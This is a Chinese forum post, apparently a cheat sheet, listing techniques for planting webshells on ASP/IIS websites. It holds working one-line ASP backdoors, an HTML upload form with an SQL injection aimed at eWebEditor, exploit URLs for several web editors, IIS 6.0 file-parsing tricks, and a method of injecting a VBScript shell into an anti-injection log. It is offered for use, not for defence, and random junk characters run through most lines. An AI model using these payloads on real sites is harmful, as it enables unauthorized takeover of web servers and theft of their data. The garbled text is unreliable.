|
 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
: S7 i/ H3 N! L1 m# s6 q1 }# _
2 G0 G0 N* C( x0 k* H2 h" w E2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp! b- _' X. p# [$ u& o) i2 \9 B3 o U
; ?- `* B% A. U6 ]) i3.上传漏洞:- {' f8 r5 K: i& n
0 w f8 `+ F0 V( G
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00' p- C2 c. K5 `2 [. t6 V1 m0 J
2 L+ \/ m+ G5 g1 c1 q5 e
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件, n5 V- L3 c1 w; u1 A4 S
- |0 u! n2 c2 f1 r. z& N雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp! W9 I* }4 p/ {$ t9 i. e
然后在上传文件里面填要传的图片格式的ASP木马
4 `' t% d' V2 F- L就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
) p; d: [. j& M5 x+ H( ?3 X: x4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传" e" a7 {& ]8 g6 ]: u
0 u4 N) u. A4 [/ H5 O
<html>
6 z4 v; @* t5 ]% ^( \" t e<head>
/ q, X! ~" c/ |0 P, m- y" n9 E/ a<title>ewebeditor upload.asp上传利用</title>
+ O+ b A; ?$ A) X) d @' s</head>
) X; A# [ L4 u( i) H9 z7 C<body>
0 i& L1 m/ e) W' e' ?<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
. K- t! L K3 v) J( J, @' T<input type=file name=uploadfile size=100><br><br>! }8 {1 M' ~' ^0 {
<input type=submit value=Fuck>
0 z4 A' r5 U9 K/ [' u, d" Q/ k- [% Z</form>, S7 p4 X E- O+ q/ Z
</body>
& X4 g: I. O# Y ^! b8 R# Q</form>
% A" ?, h* c2 V' `- a</html>, a1 X9 r8 G1 F4 E+ L0 e" D& R) p
( u. ^9 ^* z; M/ q6 E
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问" e: `0 {0 v& D8 D, e V
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp. Q5 y: n% `5 a4 `9 z* @
3 Y* B5 P! ^' Q) Y
利用windows2003解析。建立zjq.asp的文件夹
# d4 W$ P; o% e7 [
B% A5 J% m) v( f6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
! k l# t$ X$ y" e/ _6 b0 b/ z( c- q% b0 k4 ~1 _, C( ]
7.cuteeditor:类似ewebeditor y# K7 N. X8 g2 v+ v. F R; Y
* w4 \. i+ t* Q) L1 r
8.htmleditor:同上1 x6 K, @+ _/ _8 u. |7 A1 G) Q
w; o, l# g6 U! @2 J9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
- r* D' d$ z7 a2 W+ A8 G# |7 p- H& y l- I H$ G7 ~' d; \( Z. i
<%execute request("value")%><%'<% loop <%:%>' j Q) p9 X$ g3 I
" O( f' b4 o# M! L% ?* P6 w& o<%'<% loop <%:%><%execute request("value")%>
4 b& I; T0 ?: }, I4 F7 y' o+ U3 B x5 P/ f {
<%execute request("value")'<% loop <%:%># Q* ] s: n7 x+ @9 s0 D3 ` k% ~
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
0 _+ _5 ~* O, X0 I! v( ?4 F5 L% d4 Q( |3 B1 b- C
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
, H4 L. h' y% r
- g6 _7 \9 F, ~' _11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3/ Z6 b5 D% s; N0 k$ Z# T) w, z
8 O2 Z% l- `- r7 A6 h
解析漏洞得到webshell- u* a/ _; V+ |: e& _/ \
- I7 n9 R6 j9 X+ ~8 k/ ]
12.mssql差异备份,日志备份,前提需知道web路径
4 k( D* o' U4 P" V! u0 j" k' z8 V2 P4 t, F2 ~/ j" S1 i
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell3 d- d( H) `, H2 P% b1 v: P
" ^' ?- c' S' X' N$ h$ G0 m/ C14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell1 {, H- [1 m3 q, S: a; p
; g" F G7 p" h, m
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
' M$ b% h/ b+ [/ J& S
2 i% R8 X% U# P" f以上只是本人的一些拙见,并不完善,以后想到了再继续添加
8 Y5 [( Z" k+ x! z$ O+ ^不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|